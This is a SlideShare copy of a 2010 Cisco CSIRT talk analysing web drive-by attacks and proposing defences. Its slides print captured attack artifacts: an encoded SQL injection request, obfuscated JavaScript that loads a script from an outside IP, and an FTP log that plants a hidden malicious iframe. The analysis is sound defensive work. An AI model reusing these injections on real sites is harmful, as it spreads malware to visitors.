SlideShare uma empresa Scribd logo
1 de 44
Baixar para ler offline
A Study on the State of
Web Security
Henry Stern
Security Investigator
Cisco CSIRT


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   1
1.  Hacked While Browsing
2.  Web Exploit Architecture
3.  The Study
4.  Securing your Clients and Servers




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   2
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   3
4
    © 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   4
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   5
6
© 2010 Cisco and/or its affiliates. All rights reserved.       Cisco Public   6
•  Let’s see what’s
                                                            happening behind the
                                                            scenes




© 2010 Cisco and/or its affiliates. All rights reserved.                         Cisco Public   7
How does a Web Page Work?
            HTML: Web site “recipe.”
            Initial HTML retrieval provides
            “recipe”.
            Browser then fetches
            all objects listed in initial
            HTML “recipe”.
            Web Resources:
            The actual ingredients.
            Retrieved, per the HTML, from
            any specified location. Includes
                     Images
                     Scripts
                     Executable objects (“plug-ins”)
                     Other web pages




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   8
•  URLs in browser: 1

                                                           •  HTTP Gets: 162
                                                           •  Images: 66
                                                             from 18 domains including
                                                             5 separate 1x1 pixel invisible
                                                             tracking images


                                                           •  Scripts: 87 from 7 domains

                                                           •  Cookies: 118 from
                                                             15 domains

                                                           •  8 Flash objects from
                                                             4 domains




© 2010 Cisco and/or its affiliates. All rights reserved.                                      Cisco Public   9
•  Web page HTML is
                                                            the recipe
                                                           •  Code snippets are web
                                                            site ingredients
                                                           •  The browser will fetch
                                                            each ingredient
                                                           •  Each ingredient
                                                            initiates a HTTP
                                                            transaction




© 2010 Cisco and/or its affiliates. All rights reserved.                        Cisco Public   10
•  “Application Vulnerabilities Exceed OS Vulnerabilities”

•  IE and Firefox vulnerable

•  “…hundreds of vulnerabilities in ActiveX controls installed by
       software vendors have been discovered.”




                  Sources: SANS Top Cyber Security Risks 2007, 2009
                  http://www.sans.org/top-cyber-security-risks/




© 2010 Cisco and/or its affiliates. All rights reserved.              Cisco Public   11
•  Quicktime, Java, Flash, Reader, DirectX

 •  Explosion of Browser Helper Objects and
        third-party plug-ins
 •  Plug-ins are installed (semi) transparently by website. Users
        unaware an at-risk helper object or plug-in is installed …
        introducing more avenues for hackers to exploit users visiting
        malicious web sites.




12
 © 2010 Cisco and/or its affiliates. All rights reserved.            Cisco Public   12
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   13
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   14
•  brookeseidl.com registered at eNom 2002

•  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains




               Script injected onto web page – one extra ingredient!



© 2010 Cisco and/or its affiliates. All rights reserved.               Cisco Public   15
•  Browser fetches h.js javascript from tejary.net

•  Tejary.net registered 2003 at GoDaddy and hosted on
       68.178.160.68 in Arizona
•  Registered by Aljuraid, Mr Nassir A in Saudi Arabia

•  Tejary.net/h.js calls two remote iframe objects




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   16
•  V3i9.cn registered at                                   by   On
       3/25/09. DNS by mysuperdns.com
•  Hosted on 216.245.201.208 at Limestone Networks in
       Dallas, TX
•  Fetched objects include
            ipp.htm, real.html, real.js
            14.htm, 14.Js
            flash.htm, igg.htm




© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   17
It all starts with /c.htm loaded from tejary.net, said7.com
Real Player Exploit
•  /ipp.htm – Real Player exploit CVE-2008-1309
•  2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky



•  /real.htm, /real.js – Real Player exploit CVE-2007-5601




MDAC (Microsoft Data Access Component) Exploit
•  /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions

Flash Exploit
•  /swfobject.js – detects flash version and selects according content
•  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect
•  /igg.htm - ??? Called from /flash.htm for exploit?




© 2010 Cisco and/or its affiliates. All rights reserved.                             Cisco Public   18
•  After successful exploit,
       malware installed from v3i9.cn


•  ce.exe = Gh0st malware

       Keylogging, web cam monitoring
       Persistent connection to China:
       58.253.68.68 vobe.3322.org




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   19
“…Criminals have used the Internet
                                                           to steal more than $100 million
                                                           from U.S. banks so far this year
                                                           and they did it without ever having
                                                           to draw a gun or pass a note to a
                                                           teller…

                                                           …I've seen attacks where there's
                                                           been $10 million lost in one
                                                           24-hour period.”


                                                           -Shawn Henry
                                                           FBI Assistant Director, Cyber Division
                                                           8 Nov 2010 CBS “60 Minutes”
© 2010 Cisco and/or its affiliates. All rights reserved.                                      Cisco Public   20
•  Ce.exe analyzed
                     on Virus Total


                     31% detection on days 1, 2



                     48% detection on day 3


              •  21% detection for
                     SMS.exe




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   21
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   22
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   23
“By enticing a user to visit a
       maliciously crafted web page,
         an attacker may trigger the
          issue, which may lead to
          arbitrary code execution.”


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   24
•  Lots of legitimate web surfing.

•  Our enterprise customers each request millions of pages per day.

•  Miscreants tap in to legitimate traffic.

•  Advantages:
            You don’t have to create new things.
            Piggyback on sites’ reputation, page rank.

•  Risk proportional to reward.




© 2010 Cisco and/or its affiliates. All rights reserved.      Cisco Public   25
•  Infected thousands of
       websites with vulnerable
       ASP and Cold Fusion pages
       and MSSQL database.
•  Infections persist to this day!

•  How? Google hacking + run
       on anyPOST /somefile.asp ID=123;DECLARE%20@S
               schema SQL
       injection.
                %20NVARCHAR(4000);SET%20@S=CAST
                   (0x4400450043004C004 … 0073006F007200%20AS
                          %20NVARCHAR(4000));EXEC(@S);




© 2010 Cisco and/or its affiliates. All rights reserved.    Cisco Public   26
•  Victims infected with info stealer by drive-by download.

•  Steals FTP credentials from victims.

•  Obfuscated javascript code is inserted into any file that contains a
       <body> tag.
•  New victims are infected through victim’s own website.

•  Infected sites were de-listed by Google.

       document.write(unescape(‘Dp%3CscOCrmKfipa0tie%20sa0rDpc%3D4P%2FvI
       %2F94c30%2EOC2vI474P%2E2%2E1a095vI%2FOCj0yhqueier0yhy%2Ejs%3E
                       <script src=//94.247.2.195/jquery.js></script>
        %3CDp%2Fsc30cri4Ppc30tDp%3E’).replace(/4P|mKf|0yh|c30|vI|ie|a0|OC|Dp/
                                           g,""));



© 2010 Cisco and/or its affiliates. All rights reserved.               Cisco Public   27
[SOCKS 5 header]
USER victim
PASS a 9-digit secure random password
PASV
TYPE I
RETR //public_html/forum/db/index.htm
PASV
<iframe src="http://activeware.cn/ind.php" width="1" height="1"
TYPE I               alt="YTREWQhej2Htyu"
STOR style="visibility:hidden;position:absolute”></iframe>
      //public_html/forum/db/index.htm
QUIT
         Source: Christian Kreibich at ICSI Berkeley




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   28
•  Whole website with
       aggressive SEO uploaded
       to compromised host.
•  Hotlinks to images on
       legitimate websites.
•  GIS queries send users to
       SEO site instead of image
       host.
•  Links to drive-by
       download.



© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   29
30
© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   30
•  Malicious banner ads unknowingly served by Google and
       Microsoft.




•  Caused a drive-by download.

•  ScanSafe: 10% of hits via Hotmail.
                                                 Adshufffle.com
•  Installed fake AV.




© 2010 Cisco and/or its affiliates. All rights reserved.          Cisco Public   31
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   32
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   33
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   34
•  Phone-home data from thousands of IronPort web proxies.

•  Anonymized traffic summaries.

•  Web reputation: Bad, Neutral and Good.
            Default actions: Block, scan, allow.
            Plus content policies.

•  Randomly sampled 1 billion clicks from pool of 3 trillion.

•  Used actual action taken by the appliance.




© 2010 Cisco and/or its affiliates. All rights reserved.        Cisco Public   35
Bad; 1%


                                                           Good; 14%


                                                                                  93% Blocked
                                 1% Blocked




                                                                       Neutral; 85%

                                 3% Blocked




© 2010 Cisco and/or its affiliates. All rights reserved.                                        Cisco Public   36
Flash; 2% Other; 9%
                                          CSS; 3% Zip; 0%

                                                    XML; 3%

                                       Binary; 3%
                                      Video; 5%
                                                                                Image; 45%

                                                           Javascript;
                                                              13%


                                                                    HTML; 17%




© 2010 Cisco and/or its affiliates. All rights reserved.                                     Cisco Public   37
0.90%
                                                  0.80%
          0.80%
          0.70%
          0.60%
          0.50%
          0.40%
          0.30%
                                                           0.20%                   0.17%
          0.20%
                                                                   0.08%   0.07%
          0.10%
          0.00%
                                            Javascript     Flash   PDF     Image   Binary


© 2010 Cisco and/or its affiliates. All rights reserved.                              Cisco Public   38
Good: 5%




                                                                             Bad: 21%




                                                           Neutral: 74%




© 2010 Cisco and/or its affiliates. All rights reserved.                                Cisco Public   39
© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   40
•  Users
            Targeted training designed to defend against social engineering.

•  Host-level
            Patch browser and applications.
            Audit all applications and files on desktops.
            “Lock down” hosts where applicable.

•  Network-level security
            Reputation and content scanning for all web objects.
            Secure HTTPS.
            Usability vs. security: block objects not pages.
            Active detection of infected users.




© 2010 Cisco and/or its affiliates. All rights reserved.                       Cisco Public   41
•  Secure web application development (OWASP).

•  Vulnerability assessment before deployment.

•  Regular penetration testing.

•  Monitor site security and integrity.

•  Pay attention to third-party software.

•  Consider Web Application Firewall.

•  Outbound scanning with AV/Safe Browsing.

•  Two-factor authentication.

•  IP-based access controls.


© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   42
•  Compliance and auditing.

•  Security posture.

•  Third-party integration.

•  Secondary usage of data.

•  Geographical affinity.

•  Incident reporting.




© 2010 Cisco and/or its affiliates. All rights reserved.   Cisco Public   43
Thank you.

Mais conteúdo relacionado

Semelhante a A Study on the State of Web Security

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
Aditya K Sood
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
Zoltan Balazs
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
Aditya K Sood
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
Zoltan Balazs
 
Codestrong 2012 breakout session introduction to mobile web and best practices
Codestrong 2012 breakout session   introduction to mobile web and best practicesCodestrong 2012 breakout session   introduction to mobile web and best practices
Codestrong 2012 breakout session introduction to mobile web and best practices
Axway Appcelerator
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
Gaurav Srivastav
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknock
ownerkhan
 

Semelhante a A Study on the State of Web Security (20)

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox -  AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
Webinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for DevelopersWebinar–OWASP Top 10 for JavaScript for Developers
Webinar–OWASP Top 10 for JavaScript for Developers
 
What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?What is Cryptojacking and How Can I Protect Myself?
What is Cryptojacking and How Can I Protect Myself?
 
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
Browser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarterBrowser Compete - IE8 FireStarter
Browser Compete - IE8 FireStarter
 
Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
 
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
Evolving Threat Landscapes Web-Based Botnet Through Exploit Kits and Scripts ...
 
Zero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source SoftwareZero Day Malware Detection/Prevention Using Open Source Software
Zero Day Malware Detection/Prevention Using Open Source Software
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Codestrong 2012 breakout session introduction to mobile web and best practices
Codestrong 2012 breakout session   introduction to mobile web and best practicesCodestrong 2012 breakout session   introduction to mobile web and best practices
Codestrong 2012 breakout session introduction to mobile web and best practices
 
Rome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat botsRome 2017: Building advanced voice assistants and chat bots
Rome 2017: Building advanced voice assistants and chat bots
 
Beyond the 'cript practical i os reverse engineering lascon
Beyond the 'cript  practical i os reverse engineering lasconBeyond the 'cript  practical i os reverse engineering lascon
Beyond the 'cript practical i os reverse engineering lascon
 
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
Building advanced Chats Bots and Voice Interactive Assistants - Stève Sfartz ...
 
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_230 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
30 it securitythreatsvulnerabilitiesandcountermeasuresv1_2
 
BSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based SecurityBSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
BSides Rochester 2018: Anthony DiDonato: Virtualization Based Security
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknock
 
Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Security
 

Mais de Cisco Canada

Mais de Cisco Canada (20)

Cisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devopsCisco connect montreal 2018 net devops
Cisco connect montreal 2018 net devops
 
Cisco connect montreal 2018 iot demo kinetic fr
Cisco connect montreal 2018   iot demo kinetic frCisco connect montreal 2018   iot demo kinetic fr
Cisco connect montreal 2018 iot demo kinetic fr
 
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal VirtualizationCisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
Cisco connect montreal 2018 - Network Slicing: Horizontal Virtualization
 
Cisco connect montreal 2018 secure dc
Cisco connect montreal 2018    secure dcCisco connect montreal 2018    secure dc
Cisco connect montreal 2018 secure dc
 
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018   enterprise networks - say goodbye to vla nsCisco connect montreal 2018   enterprise networks - say goodbye to vla ns
Cisco connect montreal 2018 enterprise networks - say goodbye to vla ns
 
Cisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse localeCisco connect montreal 2018 vision mondiale analyse locale
Cisco connect montreal 2018 vision mondiale analyse locale
 
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec CiscoCisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
Cisco Connect Montreal 2018 Securité : Sécuriser votre mobilité avec Cisco
 
Cisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybridesCisco connect montreal 2018 collaboration les services webex hybrides
Cisco connect montreal 2018 collaboration les services webex hybrides
 
Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018Integration cisco et microsoft connect montreal 2018
Integration cisco et microsoft connect montreal 2018
 
Cisco connect montreal 2018 compute v final
Cisco connect montreal 2018   compute v finalCisco connect montreal 2018   compute v final
Cisco connect montreal 2018 compute v final
 
Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2Cisco connect montreal 2018 saalvare md-program-xr-v2
Cisco connect montreal 2018 saalvare md-program-xr-v2
 
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
Cisco connect montreal 2018 sd wan - delivering intent-based networking to th...
 
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...Cisco Connect Toronto 2018   DNA automation-the evolution to intent-based net...
Cisco Connect Toronto 2018 DNA automation-the evolution to intent-based net...
 
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
Cisco Connect Toronto 2018   an introduction to Cisco kineticCisco Connect Toronto 2018   an introduction to Cisco kinetic
Cisco Connect Toronto 2018 an introduction to Cisco kinetic
 
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...Cisco Connect Toronto 2018   IOT - unlock the power of data - securing the in...
Cisco Connect Toronto 2018 IOT - unlock the power of data - securing the in...
 
Cisco Connect Toronto 2018 DevNet Overview
Cisco Connect Toronto 2018  DevNet OverviewCisco Connect Toronto 2018  DevNet Overview
Cisco Connect Toronto 2018 DevNet Overview
 
Cisco Connect Toronto 2018 DNA assurance
Cisco Connect Toronto 2018  DNA assuranceCisco Connect Toronto 2018  DNA assurance
Cisco Connect Toronto 2018 DNA assurance
 
Cisco Connect Toronto 2018 network-slicing
Cisco Connect Toronto 2018   network-slicingCisco Connect Toronto 2018   network-slicing
Cisco Connect Toronto 2018 network-slicing
 
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
Cisco Connect Toronto 2018   the intelligent network with cisco merakiCisco Connect Toronto 2018   the intelligent network with cisco meraki
Cisco Connect Toronto 2018 the intelligent network with cisco meraki
 
Cisco Connect Toronto 2018 sixty to zero
Cisco Connect Toronto 2018   sixty to zeroCisco Connect Toronto 2018   sixty to zero
Cisco Connect Toronto 2018 sixty to zero
 

Último

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Último (20)

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 

A Study on the State of Web Security

  • 1. A Study on the State of Web Security Henry Stern Security Investigator Cisco CSIRT © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 1
  • 2. 1.  Hacked While Browsing 2.  Web Exploit Architecture 3.  The Study 4.  Securing your Clients and Servers © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 2
  • 3. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
  • 4. 4 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
  • 5. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 5
  • 6. 6 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 6
  • 7. •  Let’s see what’s happening behind the scenes © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 7
  • 8. How does a Web Page Work? HTML: Web site “recipe.” Initial HTML retrieval provides “recipe”. Browser then fetches all objects listed in initial HTML “recipe”. Web Resources: The actual ingredients. Retrieved, per the HTML, from any specified location. Includes Images Scripts Executable objects (“plug-ins”) Other web pages © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 8
  • 9. •  URLs in browser: 1 •  HTTP Gets: 162 •  Images: 66 from 18 domains including 5 separate 1x1 pixel invisible tracking images •  Scripts: 87 from 7 domains •  Cookies: 118 from 15 domains •  8 Flash objects from 4 domains © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 9
  • 10. •  Web page HTML is the recipe •  Code snippets are web site ingredients •  The browser will fetch each ingredient •  Each ingredient initiates a HTTP transaction © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 10
  • 11. •  “Application Vulnerabilities Exceed OS Vulnerabilities” •  IE and Firefox vulnerable •  “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” Sources: SANS Top Cyber Security Risks 2007, 2009 http://www.sans.org/top-cyber-security-risks/ © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 11
  • 12. •  Quicktime, Java, Flash, Reader, DirectX •  Explosion of Browser Helper Objects and third-party plug-ins •  Plug-ins are installed (semi) transparently by website. Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites. 12 © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 12
  • 13. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 13
  • 14. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 14
  • 15. •  brookeseidl.com registered at eNom 2002 •  63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains Script injected onto web page – one extra ingredient! © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 15
  • 16. •  Browser fetches h.js javascript from tejary.net •  Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona •  Registered by Aljuraid, Mr Nassir A in Saudi Arabia •  Tejary.net/h.js calls two remote iframe objects © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 16
  • 17. •  V3i9.cn registered at by On 3/25/09. DNS by mysuperdns.com •  Hosted on 216.245.201.208 at Limestone Networks in Dallas, TX •  Fetched objects include ipp.htm, real.html, real.js 14.htm, 14.Js flash.htm, igg.htm © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 17
  • 18. It all starts with /c.htm loaded from tejary.net, said7.com Real Player Exploit •  /ipp.htm – Real Player exploit CVE-2008-1309 •  2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky •  /real.htm, /real.js – Real Player exploit CVE-2007-5601 MDAC (Microsoft Data Access Component) Exploit •  /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions Flash Exploit •  /swfobject.js – detects flash version and selects according content •  /flash.htm – Flash exploit. 2/40 anti-virus vendors detect •  /igg.htm - ??? Called from /flash.htm for exploit? © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 18
  • 19. •  After successful exploit, malware installed from v3i9.cn •  ce.exe = Gh0st malware Keylogging, web cam monitoring Persistent connection to China: 58.253.68.68 vobe.3322.org © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 19
  • 20. “…Criminals have used the Internet to steal more than $100 million from U.S. banks so far this year and they did it without ever having to draw a gun or pass a note to a teller… …I've seen attacks where there's been $10 million lost in one 24-hour period.” -Shawn Henry FBI Assistant Director, Cyber Division 8 Nov 2010 CBS “60 Minutes” © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 20
  • 21. •  Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 •  21% detection for SMS.exe © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 21
  • 22. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 22
  • 23. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 23
  • 24. “By enticing a user to visit a maliciously crafted web page, an attacker may trigger the issue, which may lead to arbitrary code execution.” © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 24
  • 25. •  Lots of legitimate web surfing. •  Our enterprise customers each request millions of pages per day. •  Miscreants tap in to legitimate traffic. •  Advantages: You don’t have to create new things. Piggyback on sites’ reputation, page rank. •  Risk proportional to reward. © 2010 Cisco and/or its affiliates. All rights reserved. Cisco Public 25
